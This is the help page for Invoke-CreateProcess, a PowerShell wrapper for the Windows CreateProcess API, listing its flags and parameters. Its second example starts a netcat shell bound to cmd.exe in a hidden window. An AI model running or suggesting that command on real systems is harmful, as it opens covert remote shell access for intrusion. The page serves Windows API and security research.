Invoke-CreateProcess is a PowerShell wrapper for Kernel32 CreateProcess. For full details you can read the associated post on accessing the Windows API from PowerShell here.
PS C:\Users\Fubar\Desktop> . .\Invoke-CreateProcess.ps1 PS C:\Users\Fubar\Desktop> Get-Help Invoke-CreateProcess -Full NAME Invoke-CreateProcess SYNOPSIS -Binary Full path of the module to be executed. -Args Arguments to pass to the module, e.g. "/c calc.exe". Defaults to $null if not specified. -CreationFlags Process creation flags: 0x00000000 (NONE) 0x00000001 (DEBUG_PROCESS) 0x00000002 (DEBUG_ONLY_THIS_PROCESS) 0x00000004 (CREATE_SUSPENDED) 0x00000008 (DETACHED_PROCESS) 0x00000010 (CREATE_NEW_CONSOLE) 0x00000200 (CREATE_NEW_PROCESS_GROUP) 0x00000400 (CREATE_UNICODE_ENVIRONMENT) 0x00000800 (CREATE_SEPARATE_WOW_VDM) 0x00001000 (CREATE_SHARED_WOW_VDM) 0x00040000 (CREATE_PROTECTED_PROCESS) 0x00080000 (EXTENDED_STARTUPINFO_PRESENT) 0x01000000 (CREATE_BREAKAWAY_FROM_JOB) 0x02000000 (CREATE_PRESERVE_CODE_AUTHZ_LEVEL) 0x04000000 (CREATE_DEFAULT_ERROR_MODE) 0x08000000 (CREATE_NO_WINDOW) -ShowWindow Window display flags: 0x0000 (SW_HIDE) 0x0001 (SW_SHOWNORMAL) 0x0001 (SW_NORMAL) 0x0002 (SW_SHOWMINIMIZED) 0x0003 (SW_SHOWMAXIMIZED) 0x0003 (SW_MAXIMIZE) 0x0004 (SW_SHOWNOACTIVATE) 0x0005 (SW_SHOW) 0x0006 (SW_MINIMIZE) 0x0007 (SW_SHOWMINNOACTIVE) 0x0008 (SW_SHOWNA) 0x0009 (SW_RESTORE) 0x000A (SW_SHOWDEFAULT) 0x000B (SW_FORCEMINIMIZE) 0x000B (SW_MAX) -StartF Bitfield to influence window creation: 0x00000001 (STARTF_USESHOWWINDOW) 0x00000002 (STARTF_USESIZE) 0x00000004 (STARTF_USEPOSITION) 0x00000008 (STARTF_USECOUNTCHARS) 0x00000010 (STARTF_USEFILLATTRIBUTE) 0x00000020 (STARTF_RUNFULLSCREEN) 0x00000040 (STARTF_FORCEONFEEDBACK) 0x00000080 (STARTF_FORCEOFFFEEDBACK) 0x00000100 (STARTF_USESTDHANDLES) SYNTAX Invoke-CreateProcess [-Binary] <String> [[-Args] <String>] [-CreationFlags] <Int32> [-ShowWindow] <Int32> [-StartF] <Int32> [<CommonParameters>] DESCRIPTION Author: Ruben Boonen (@FuzzySec) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None PARAMETERS -Binary <String> Required? true Position? 1 Default value Accept pipeline input? false Accept wildcard characters? -Args <String> Required? false Position? 2 Default value Accept pipeline input? false Accept wildcard characters? -CreationFlags <Int32> Required? true Position? 3 Default value Accept pipeline input? false Accept wildcard characters? -ShowWindow <Int32> Required? true Position? 4 Default value Accept pipeline input? false Accept wildcard characters? -StartF <Int32> Required? true Position? 5 Default value Accept pipeline input? false Accept wildcard characters? <CommonParameters> This cmdlet supports the common parameters: Verbose, Debug, ErrorAction, ErrorVariable, WarningAction, WarningVariable, OutBuffer and OutVariable. For more information, type, "get-help about_commonparameters". INPUTS OUTPUTS -------------------------- EXAMPLE 1 -------------------------- Start calc with NONE/SW_SHOWNORMAL/STARTF_USESHOWWINDOW C:\PS> Invoke-CreateProcess -Binary C:\Windows\System32\calc.exe -CreationFlags 0x0 -ShowWindow 0x1 -StartF 0x1 -------------------------- EXAMPLE 2 -------------------------- Start nc reverse shell with CREATE_NO_WINDOW/SW_HIDE/STARTF_USESHOWWINDOW C:\PS> Invoke-CreateProcess -Binary C:\Some\Path\nc.exe -Args "-nv 9988 -e C:\Windows\System32\cmd.exe" -CreationFlags 0x8000000 -ShowWindow 0x0 -StartF 0x1
Download: Invoke-CreateProcess.ps1